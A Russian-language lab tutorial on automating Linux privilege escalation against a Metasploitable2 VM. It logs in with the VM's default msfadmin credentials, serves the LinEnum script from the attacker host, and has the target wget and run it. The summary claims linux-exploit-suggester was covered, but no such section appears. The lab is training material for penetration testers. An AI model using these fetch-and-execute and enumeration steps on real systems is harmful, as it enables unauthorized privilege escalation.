Введение
В этом лабораторном занятии мы рассмотрим два наиболее часто используемых инструмента автоматизации повышения привилегий в Linux - LinEnum и linux-exploit-suggester. Цель состоит в том, чтобы научиться эффективно использовать эти инструменты для ускорения процесса повышения привилегий во время пентеста или безопасности оценки. Освоение этих инструментов может значительно сэкономить время и усилия, позволив вам сосредоточиться на понимании основополагающих принципов и методологий повышения привилегий.
Настройка среды
На этом шаге мы настроим виртуальную машину Metasploitable2, которая будет служить нашей целевой системой. Следуйте инструкциям ниже, чтобы запустить виртуальную машину и установить соединение:
В нашей лабораторной среде настройка виртуальной машины Metasploitable2 была предварительно настроена. Вы можете запустить виртуальную машину и подключиться к ней с помощью следующих шагов:
Откройте терминал и выполните следующую команду, чтобы запустить виртуальную машину Metasploitable2:
sudo virsh start Metasploitable2Подождите 1 - 2 минуты, пока виртуальная машина полностью загрузится и будет готова к использованию.
Убедитесь, что вы можете отправить ping - запрос на IP - адрес Metasploitable2 (192.168.122.102) с вашего хост - компьютера.
Используйте следующую команду, чтобы подключиться к виртуальной машине Metasploitable2 по SSH:
ssh msfadmin@192.168.122.102При первом подключении вас попросят подтвердить подлинность хоста. Введите
yesи нажмитеEnter, чтобы продолжить.Затем введите пароль
msfadmin, когда вас об этом попросят:msfadmin
После успешной аутентификации у вас должна быть сессия оболочки с низкими привилегиями на виртуальной машине Metasploitable2.
LinEnum: автоматизация перечисления Linux - системы
LinEnum - это мощный скрипт, который автоматизирует процесс перечисления на системе Linux, собирая ценную информацию, которая может помочь в процессе повышения привилегий. Следуйте шагам ниже, чтобы использовать LinEnum на виртуальной машине Metasploitable2:
На вашем хост - компьютере откройте терминал и перейдите в каталог
/tmp:cd /tmpВ каталоге
/tmpпроекта есть скрипт с именемLinEnum.sh.Запустите HTTP - сервер Python в каталоге
/tmp, чтобы разместить скрипт LinEnum:python3 -m http.server 8000На виртуальной машине
Metasploitable2перейдите в каталог/tmpи загрузите скрипт LinEnum с помощьюwgetс HTTP - сервера Python, запущенного на вашем хост - компьютере:Перейдите в каталог
/tmp:cd /tmpwget 192.168.122.1:8000/LinEnum.sh -P /tmpСделайте скрипт LinEnum исполняемым:
chmod +x LinEnum.shВыполните скрипт LinEnum и перенаправьте вывод в файл для дальнейшего анализа:
LinEnum.sh > linenum_output.txt
LinEnum выполнит различные проверки и перечислит системную информацию, выделяя потенциальные уязвимости или неправильные настройки желтым текстом. Уделите особое внимание этим выделенным областям, так как они могут раскрыть возможности для повышения привилегий.
Резюме
В этом лабораторном занятии мы научились использовать два мощных инструмента автоматизации, LinEnum и linux-exploit-suggester, для помощи в процессе повышения привилегий на системах Linux. LinEnum предоставляет комплексное перечисление системной информации, выделяя потенциальные уязвимости и неправильные настройки. Инструмент linux-exploit-suggester анализирует версию ядра и предлагает соответствующие эксплойты для ядра, которые могут привести к повышению привилегий.
Используя эти инструменты, мы можем упростить фазы сбора и анализа информации, экономя ценное время во время пентеста или безопасности оценки. Однако важно понимать, что эти инструменты предназначены для помощи в процессе, и твердое понимание техник и методологий повышения привилегий по-прежнему необходимо для успешного эксплойта.
В рамках этого лабораторного занятия мы практиковались в настройке уязвимой виртуальной среды, загрузке и выполнении скриптов LinEnum и linux-exploit-suggester, а также интерпретации их вывода. Практический опыт, полученный в этом лабораторном занятии, будет неоценимым в реальных сценариях, где эффективное и результативное повышение привилегий является критическим навыком для этических хакеров и профессионалов в области безопасности.